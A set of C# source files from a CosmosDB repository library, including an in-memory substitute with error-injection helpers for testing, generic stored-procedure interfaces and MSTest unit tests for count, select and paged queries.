public IStoredProcedure<TParam, TResult> StoredProcedure<TParam, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TResult> StoredProcedure<TParam1, TParam2, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TResult> StoredProcedure<TParam1, TParam2, TParam3, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>(string id)
{
throw new NotImplementedException();
}
public IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult> StoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>(string id)
{
throw new NotImplementedException();
}
internal void GenerateExceptionOnGetWhen(Predicate<DocumentId> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_getExceptionConditions.Add(id => id is DocumentId && predicate((DocumentId)id) ? CreateDbException(statusCode, message) : default);
}
internal void GenerateExceptionOnGetWhen(Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_getExceptionConditions.Add(entity => entity is T && predicate((T)entity) ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnGet()
{
_getExceptionConditions.Clear();
}
internal void GenerateExceptionOnAddWhen(Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_addExceptionConditions.Add(entity => predicate(entity) ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnAdd()
{
_addExceptionConditions.Clear();
}
internal void GenerateExceptionOnDeleteWhen(Predicate<DocumentId> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_deleteExceptionConditions.Add(id => id is DocumentId && predicate((DocumentId)id) ? CreateDbException(statusCode, message) : default);
}
internal void GenerateExceptionOnDeleteWhen(Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_deleteExceptionConditions.Add(entity => entity is T && predicate((T)entity) ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnDelete()
{
_deleteExceptionConditions.Clear();
}
internal void GenerateExceptionOnFindWhen(Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_findExceptionConditions.Add(() => predicate() ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnFind()
{
_findExceptionConditions.Clear();
}
internal void GenerateExceptionOnFindFirstOrDefaultWhen(Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_findFirstOrDefaultExceptionConditions.Add(() => predicate() ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnFindFirstOrDefault()
{
_findFirstOrDefaultExceptionConditions.Clear();
}
internal void GenerateExceptionOnReplaceWhen(Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_replaceExceptionConditions.Add(entity => predicate(entity) ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnReplace()
{
_replaceExceptionConditions.Clear();
}
internal void GenerateExceptionOnSelectWhen(Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_selectExceptionConditions.Add(() => predicate() ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnSelect()
{
_selectExceptionConditions.Clear();
}
internal void GenerateExceptionOnSelectManyWhen(Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_selectManyExceptionConditions.Add(() => predicate() ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnSelectMany()
{
_selectManyExceptionConditions.Clear();
}
internal void GenerateExceptionOnUpsertWhen(Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_upsertExceptionConditions.Add(entity => predicate(entity) ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnUpsert()
{
_upsertExceptionConditions.Clear();
}
internal void GenerateExceptionOnCountWhen(Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
_countExceptionConditions.Add(() => predicate() ? CreateDbException(statusCode, message) : default);
}
internal void ClearGenerateExceptionOnCount()
{
_countExceptionConditions.Clear();
}
private static T DeepClone(T src)
{
return (src == default)
? default
: JsonConvert.DeserializeObject<T>(JsonConvert.SerializeObject(src));
}
private class EntityStorage
{
private static readonly Action<T, string> SetETag;
private static readonly Func<T, string> GetETag;
private static readonly Func<T, DocumentId> GetId;
private static readonly Action<T, DocumentId> SetId;
private static readonly Func<T, long> GetTS;
private static readonly Action<T, long> SetTS;
public readonly T Entity;
public DocumentId Id
{
get => GetId(Entity);
set => SetId(Entity, value);
}
public string ETag
{
get => GetETag(Entity);
set => SetETag(Entity, value);
}
public long TS
{
get => GetTS(Entity);
set => SetTS(Entity, value);
}
static EntityStorage()
{
(string name, PropertyInfo info) GetPropertyJsonName(PropertyInfo pi)
{
var jsonProperty = pi.GetCustomAttribute<JsonPropertyAttribute>();
return (jsonProperty?.PropertyName ?? pi.Name, pi);
}
var properties = typeof(T).GetProperties().Select(GetPropertyJsonName).ToDictionary(o => o.name, o => o.info);
var idProperty = properties["id"];
GetId = BuildIdGet(idProperty, true);
SetId = BuildIdSet(idProperty, true);
properties.TryGetValue("_etag", out var eTagProperty);
GetETag = BuildETagGet(eTagProperty, false);
SetETag = BuildETagSet(eTagProperty, false);
properties.TryGetValue("_ts", out var tsProperty);
GetTS = BuildTSGet(tsProperty);
SetTS = BuildTSSet(tsProperty);
}
public EntityStorage(T entity)
{
Entity = DeepClone(entity);
}
private static Func<T, DocumentId> BuildIdGet(PropertyInfo idProperty, bool required)
{
if (idProperty == default)
{
if (required)
throw new InvalidOperationException("Missing field");
return _ => default;
}
var source = Expression.Parameter(typeof(T), "source");
Expression IdProperty = Expression.Property(source, idProperty);
// var converter = typeof(DocumentId).GetMethod("op_Implicit", new[] { idProperty.PropertyType });
// IdProperty = Expression.Call(converter, IdProperty);
IdProperty = Expression.Convert(IdProperty, typeof(DocumentId));
return Expression.Lambda<Func<T, DocumentId>>(IdProperty, source).Compile();
}
private static Action<T, DocumentId> BuildIdSet(PropertyInfo idProperty, bool required)
{
if (idProperty == default)
{
if (required)
throw new InvalidOperationException("Missing field");
return (_, __) => { };
}
if (!idProperty.CanWrite)
{
return (_, __) => throw new InvalidOperationException("The id property is not assignable");
}
var source = Expression.Parameter(typeof(T), "source");
var value = Expression.Parameter(typeof(DocumentId), "value");
Expression IdProperty = Expression.Property(source, idProperty);
var body = Expression.Assign(IdProperty, Expression.Convert(value, idProperty.PropertyType));
return Expression.Lambda<Action<T, DocumentId>>(body, source, value).Compile();
}
private static Func<T, string> BuildETagGet(PropertyInfo idProperty, bool required)
{
if (idProperty == default)
{
if (required)
throw new InvalidOperationException("Missing field");
return _ => default;
}
var source = Expression.Parameter(typeof(T), "source");
Expression IdProperty = Expression.Property(source, idProperty);
if (idProperty.PropertyType != typeof(string))
{
IdProperty = Expression.Call(IdProperty, "ToString", new Type[0]);
}
return Expression.Lambda<Func<T, string>>(IdProperty, source).Compile();
}
private static Action<T, string> BuildETagSet(PropertyInfo idProperty, bool required)
{
if (idProperty == default)
{
if (required)
throw new InvalidOperationException("Missing field");
return (_, __) => { };
}
if (!idProperty.CanWrite)
{
return (_, __) => throw new InvalidOperationException("The id property is not assignable");
}
var source = Expression.Parameter(typeof(T), "source");
var value = Expression.Parameter(typeof(string), "value");
Expression IdProperty = Expression.Property(source, idProperty);
var body = idProperty.PropertyType != typeof(string)
? Expression.Assign(IdProperty, Expression.Call(idProperty.PropertyType.GetMethod("Parse", new[] { typeof(string) }), value))
: Expression.Assign(IdProperty, value);
return Expression.Lambda<Action<T, string>>(body, source, value).Compile();
}
private static Func<T, long> BuildTSGet(PropertyInfo idProperty)
{
if (idProperty == default)
{
return _ => 0;
}
if (idProperty.PropertyType != typeof(long))
{
throw new InvalidOperationException("_ts is not type long");
}
var source = Expression.Parameter(typeof(T), "source");
Expression IdProperty = Expression.Property(source, idProperty);
return Expression.Lambda<Func<T, long>>(IdProperty, source).Compile();
}
private static Action<T, long> BuildTSSet(PropertyInfo idProperty)
{
if (idProperty == default)
{
return (_, __) => { };
}
if (!idProperty.CanWrite)
{
return (_, __) => throw new InvalidOperationException("The id property is not assignable");
}
var source = Expression.Parameter(typeof(T), "source");
var value = Expression.Parameter(typeof(long), "value");
Expression IdProperty = Expression.Property(source, idProperty);
var body = Expression.Assign(IdProperty, value);
return Expression.Lambda<Action<T, long>>(body, source, value).Compile();
}
}
private static DocumentClientException CreateDbException(HttpStatusCode statusCode, string message = default)
{
var ex = (DocumentClientException)FormatterServices.GetUninitializedObject(_dbExceptionType);
_dbExceptionType.GetProperty("StatusCode").SetValue(ex, statusCode);
_dbExceptionType.GetField("_message", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(ex, message);
return ex;
}
private bool CheckETag(T item, EntityStorage entity, out DocumentClientException exception)
{
if (new EntityStorage(item).ETag != entity.ETag)
{
exception = CreateDbException(HttpStatusCode.PreconditionFailed, "ETag mismatch");
return true;
}
exception = default;
return false;
}
}
}
<file_sep>using CosmosDbRepository;
using System;
namespace CosmosDbRepositorySubstituteTest
{
public interface ITestingContext<T>
: IDisposable
{
ICosmosDbRepository<T> Repo { get; }
}
}<file_sep>using Newtonsoft.Json;
using System;
namespace CosmosDbRepositoryTest.GuidId
{
class SubSubDataResult
{
[JsonProperty("id")]
public Guid Id { get; set; }
[JsonProperty("data")]
public string Data { get; set; }
[JsonProperty("rank")]
public int Rank { get; set; }
[JsonProperty("fid")]
public Guid FId { get; set; }
[JsonProperty("value")]
public string Value { get; set; }
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
[TestClass]
public class CosmosDbRepositoryCountTests
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task Count_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData
};
data = await context.Repo.AddAsync(data);
int count = await context.Repo.CountAsync(d => d.Data == uniqueData);
count.Should().Be(1);
}
}
[TestMethod]
public async Task Count_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
int count = await context.Repo.CountAsync(d => d.Data == uniqueData);
count.Should().Be(0);
}
}
[TestMethod]
public async Task Count_MultipleRecords_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
int count = await context.Repo.CountAsync(d => d.Data == uniqueData);
count.Should().Be(2);
}
}
}
}
<file_sep>using Microsoft.Azure.Documents;
namespace CosmosDbRepository
{
public interface ICosmosDbRepositoryBuilder
{
ICosmosDbRepositoryBuilder WithId(string name);
ICosmosDbRepositoryBuilder WithThroughput(int? defaultThroughput);
ICosmosDbRepositoryBuilder IncludeIndexPath(string path, params Index[] indexes);
ICosmosDbRepositoryBuilder ExcludeIndexPath(params string[] paths);
ICosmosDbRepositoryBuilder StoredProcedure(string id, string body);
ICosmosDbRepository Build(IDocumentClient client, ICosmosDb documentDb, int? defaultThroughput);
}
}
<file_sep>using System;
namespace CosmosDbRepository
{
[AttributeUsage(validOn: AttributeTargets.Class)]
public class CosmosDbRepositoryNameAttribute
: Attribute
{
public string Name { get; }
public CosmosDbRepositoryNameAttribute(string name)
{
Name = name;
}
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
[TestClass]
public class CosmosDbRepositorySelectTests
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task Select_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data1 = await GetTestData(context, uniqueData, 1);
var data2a = await GetTestData(context, uniqueData, 2);
var data2b = await GetTestData(context, uniqueData, 2);
var data3a = await GetTestData(context, uniqueData, 3);
var data3b = await GetTestData(context, uniqueData, 3);
var data3c = await GetTestData(context, uniqueData, 3);
var results = await context.Repo.SelectAsync(
d => d.Rank,
whereClauses: q => q.Where(d => d.Data == uniqueData));
results.Should().NotBeNull();
results.Count().Should().Be(6);
results = await context.Repo.SelectAsync(
d => d.Rank,
q => q.Where(d => d.Data == uniqueData),
q => q.Distinct());
results.Should().NotBeNull();
results.Count().Should().Be(3);
results = await context.Repo.SelectAsync(
d => d.Rank,
whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 1));
results.Should().NotBeNull();
results.Count().Should().Be(1);
results = await context.Repo.SelectAsync(
d => d.Rank,
q => q.Where(d => d.Data == uniqueData && d.Rank == 1),
q => q.Distinct());
results.Should().NotBeNull();
results.Count().Should().Be(1);
results = await context.Repo.SelectAsync(
d => d.Rank,
whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 2));
results.Should().NotBeNull();
results.Count().Should().Be(2);
results = await context.Repo.SelectAsync(
d => d.Rank,
q => q.Where(d => d.Data == uniqueData && d.Rank == 2),
q => q.Distinct());
results.Should().NotBeNull();
results.Count().Should().Be(1);
results = await context.Repo.SelectAsync(
d => d.Rank,
whereClauses: q => q.Where(d => d.Data == uniqueData && d.Rank == 3));
results.Should().NotBeNull();
results.Count().Should().Be(3);
results = await context.Repo.SelectAsync(
d => d.Rank,
q => q.Where(d => d.Data == uniqueData && d.Rank == 3),
q => q.Distinct());
results.Should().NotBeNull();
results.Count().Should().Be(1);
}
}
[TestMethod]
public async Task Select_DistinctCount_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data1 = await GetTestData(context, uniqueData, 1, CreateSubData);
var data2a = await GetTestData(context, uniqueData, 2, CreateSubData);
var data2b = await GetTestData(context, uniqueData, 2, CreateSubData);
var data3a = await GetTestData(context, uniqueData, 3, CreateSubData);
var data3b = await GetTestData(context, uniqueData, 3, CreateSubData);
var data3c = await GetTestData(context, uniqueData, 3, CreateSubData);
var results = await context.Repo.SelectAsync(
d => d.Rank,
whereClauses: q => q.Where(d => d.Data == uniqueData));
results.Should().NotBeNull();
results.Count().Should().Be(6);
var groupResults = await context.Repo.SelectManyAsync(
d => d.Subdata.SelectMany(e => e.SubSubData).Select(f => new { d.Id, d.Data, d.Rank, fId = f.Id, f.Value }),
q => q.Where(d => d.Data == uniqueData));
groupResults.Should().NotBeNull();
var count = new[] { data1, data2a, data2b, data3a, data3b, data3c }.SelectMany(a => a.Subdata.SelectMany(b => b.SubSubData)).Count();
groupResults.Count().Should().Be(count);
}
}
private void CreateSubData(TestData<Guid> data)
{
var rand = new Random();
data.Subdata = Enumerable.Range(0, rand.Next(0, 5))
.Select(i =>
new TestSubData
{
SubSubData = Enumerable.Range(0, rand.Next(0, 5))
.Select(j => new TestSubSubData
{
Id = Guid.NewGuid(),
Value = rand.Next(256).ToString()
})
.ToArray()
})
.ToArray();
}
}
}
<file_sep>[](https://dev.azure.com/jltconsulting/CosmosDbRepository/_build/latest?definitionId=2?branchName=master)
[](https://www.nuget.org/packages/CosmosDbRepository/)
<file_sep>using System.Threading.Tasks;
namespace CosmosDbRepository
{
public interface IStoredProcedure<TResult>
{
Task<TResult> ExecuteAsync();
}
public interface IStoredProcedure<TParam, TResult>
{
Task<TResult> ExecuteAsync(TParam param);
}
public interface IStoredProcedure<TParam1, TParam2, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15);
}
public interface IStoredProcedure<TParam1, TParam2, TParam3, TParam4, TParam5, TParam6, TParam7, TParam8, TParam9, TParam10, TParam11, TParam12, TParam13, TParam14, TParam15, TParam16, TResult>
{
Task<TResult> ExecuteAsync(TParam1 param1, TParam2 param2, TParam3 param3, TParam4 param4, TParam5 param5, TParam6 param6, TParam7 param7, TParam8 param8, TParam9 param9, TParam10 param10, TParam11 param11, TParam12 param12, TParam13 param13, TParam14 param14, TParam15 param15, TParam16 param16);
}
}<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.StringId
{
[TestClass]
public class CosmosDbRepositoryFindPagedTests
: CosmosDbRepositoryStringTests
{
[TestMethod]
public async Task FindPaged_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData
};
data = await context.Repo.AddAsync(data);
var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData);
dataList.Should().NotBeNull();
dataList.Items.Should().NotBeNull();
dataList.Items.Should().BeEquivalentTo(new[] { data });
dataList.ContinuationToken.Should().BeNull();
}
}
[TestMethod]
public async Task FindPaged_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData);
dataList.Should().NotBeNull();
dataList.Items.Should().NotBeNull();
dataList.Items.Should().BeEmpty();
dataList.ContinuationToken.Should().BeNull();
}
}
[TestMethod]
public async Task FindPaged_WithContinuation_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<string>
{
Id = GetNewId(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var dataList = await context.Repo.FindAsync(1, null, d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
dataList.Should().NotBeNull();
dataList.Items.Should().NotBeNull();
dataList.Items.Should().BeEquivalentTo(new[] { data });
dataList.ContinuationToken.Should().NotBeNull();
dataList = await context.Repo.FindAsync(1, dataList.ContinuationToken, d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
dataList.Should().NotBeNull();
dataList.Items.Should().NotBeNull();
dataList.Items.Should().BeEquivalentTo(new[] { data2 });
dataList.ContinuationToken.Should().BeNull();
}
}
}
}
<file_sep>using CosmosDbRepository.Substitute;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Net;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
namespace CosmosDbRepositorySubstituteTest
{
[TestClass]
public class SubstituteTest
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task AddWithId()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, TestData<Guid> Result) repoResult;
using (var context = CreateContext())
{
repoResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
}
(Exception Exception, TestData<Guid> Result) subResult;
using (var context = CreateSubstituteContext())
{
subResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
}
repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
Regex.IsMatch(su.SelectedMemberPath, "Item2.ETag|Item2.UpdateEpoch")));
subResult.Result.ETag.Should().NotBeNullOrEmpty();
subResult.Result.UpdateEpoch.Should().NotBe(0);
}
[TestMethod]
public async Task AddWithoutId()
{
var data = new TestData<Guid>
{
Data = "My Data"
};
(Exception Exception, TestData<Guid> Result) repoResult;
using (var context = CreateContext())
{
repoResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
}
(Exception Exception, TestData<Guid> Result) subResult;
using (var context = CreateSubstituteContext())
{
subResult = await context.Repo.AddAsync(data).ContinueWith(CaptureResult);
}
repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
Regex.IsMatch(su.SelectedMemberPath, "Item2.ETag|Item2.UpdateEpoch")));
subResult.Result.ETag.Should().NotBeNullOrEmpty();
subResult.Result.UpdateEpoch.Should().NotBe(0);
}
[TestMethod]
public async Task DeleteItem()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, bool Result) repoResult;
using (var context = CreateContext())
{
var tmp = await context.Repo.AddAsync(data);
repoResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
(Exception Exception, bool) subResult;
using (var context = CreateSubstituteContext())
{
var tmp = await context.Repo.AddAsync(data);
subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
repoResult.Should().BeEquivalentTo(subResult);
}
[TestMethod]
public async Task DeleteItemWithETagChange()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, bool Result) repoResult;
using (var context = CreateContext())
{
var tmp = await context.Repo.AddAsync(data);
await context.Repo.ReplaceAsync(tmp);
repoResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
(Exception Exception, bool) subResult;
using (var context = CreateSubstituteContext())
{
var tmp = await context.Repo.AddAsync(data);
await context.Repo.ReplaceAsync(tmp);
subResult = await context.Repo.DeleteDocumentAsync(tmp).ContinueWith(CaptureResult);
}
repoResult.Should().BeEquivalentTo(subResult, opt => opt.Excluding(su =>
Regex.IsMatch(su.SelectedMemberPath, "Item1.Message|Item1.InnerException")));
}
[TestMethod]
public async Task DeleteItemByIdWithError()
{
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = "My Data"
};
(Exception Exception, bool) subResult;
using (var context = CreateSubstituteContext())
{
var tmp = await context.Repo.AddAsync(data);
